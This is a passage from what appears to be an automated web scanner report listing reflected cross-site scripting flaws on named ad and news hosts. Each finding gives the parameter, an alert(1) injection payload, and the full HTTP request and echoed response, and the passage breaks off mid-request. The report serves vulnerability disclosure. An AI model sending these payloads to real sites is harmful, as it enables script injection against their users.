GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256927cd5"><script>alert(1)</script>c7aa141f23a&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22215
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256927cd5"><script>alert(1)</script>c7aa141f23a" TARGET="_blank">
...[SNIP]...

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51fd6"%3balert(1)//2297f36f9b7 was submitted in the mpck parameter. This input was echoed as 51fd6";alert(1)//2297f36f9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256951fd6"%3balert(1)//2297f36f9b7&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21999
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256951fd6";alert(1)//2297f36f9b7", "6781558", "<geozip/>
...[SNIP]...

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d29e"%3balert(1)//977552208d was submitted in the mpvc parameter. This input was echoed as 1d29e";alert(1)//977552208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f1d29e"%3balert(1)//977552208d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21905
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f1d29e";alert(1)//977552208dhttp://rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa1
...[SNIP]...

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fe"><script>alert(1)</script>f4af9e30ca7 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f6d4fe"><script>alert(1)</script>f4af9e30ca7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22129
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f6d4fe"><script>alert(1)</script>f4af9e30ca7http://rover.ebay.com/rover/1/711-118167-1915-16/4?mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&
...[SNIP]...

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 61c78<script>alert(1)</script>60081d2e459 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J0553161c78<script>alert(1)</script>60081d2e459 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d73ef70&0&&4d4e2349&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07608=0105974ea67d21e1&G07608&0&4d73f5b7&0&&4d4e15ec&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_C07583=0105974ea67d21e1&C07583&0&4d74e384&0&&4d4f68ce&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d74ec12&0&&4d4e3c30&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_E08745=0105974ea67d21e1&E08745&0&4d7a314a&0&&4d54abd9&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_L09857=0105974ea67d21e1&L09857&0&4d7a5dc4&0&&4d550056&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A10863=0105974ea67d21e1&A10863&0&4d7b9c60&0&&4d54f31a&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H07710=0105974ea67d21e1&H07710&0&4d7bcd81&0&&4d55f92b&4c5cffb70704da9ab1f721e8ae18383d; 

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 14 Feb 2011 01:34:46 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 15 Feb 2011 01:34:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J0553161C78<SCRIPT>ALERT(1)</SCRIPT>60081D2E459" was not recognized.
*/

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.uk.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1f59%3balert(1)//ba2841abbb3 was submitted in the callback parameter. This input was echoed as e1f59;alert(1)//ba2841abbb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationse1f59%3balert(1)//ba2841abbb3&ed=uk&u=173.193.214.243-2605364368.30126492 HTTP/1.1
Host: js.uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:11 GMT
Server: Apache-Coyote/1.1
Expires: Mon, 14 Feb 2011 01:49:12 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Connection: close
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3 === 'function') {Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3([]);}

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd2a'-alert(1)-'1bc15b5788c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.dailymailffd2a'-alert(1)-'1bc15b5788c/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:29 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Content-Length: 9197

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-77028052_1297647329","http://ib.adnxs.com/ptj?member=311&inv_code=cm.dailymailffd2a'-alert(1)-'1bc15b5788c&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclic
...[SNIP]...

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6385'-alert(1)-'77065afc5a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.drudgerepf6385'-alert(1)-'77065afc5a2/;sz=300x250;net=cm;ord=$cacheBuster$;ord1=789918;cmpgurl=http%253A//www.drudgereport.com/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:10:21 GMT
Connection: close
Content-Length: 8383

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64453616_1297649421","http://ib.adnxs.com/ptj?member=311&inv_code=cm.drudgerepf6385'-alert(1)-'77065afc5a2&size=300x250&referrer=http%3A%2F%2Fwww.drudgereport.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.drudgerepf6385%27-alert%281%29-%2777065afc5a2%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-64453616_1297649421%
...[SNIP]...

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2dd"%3balert(1)//6cad627a8b3 was submitted in the l parameter. This input was echoed as 2c2dd";alert(1)//6cad627a8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd"%3balert(1)//6cad627a8b3&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=0&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
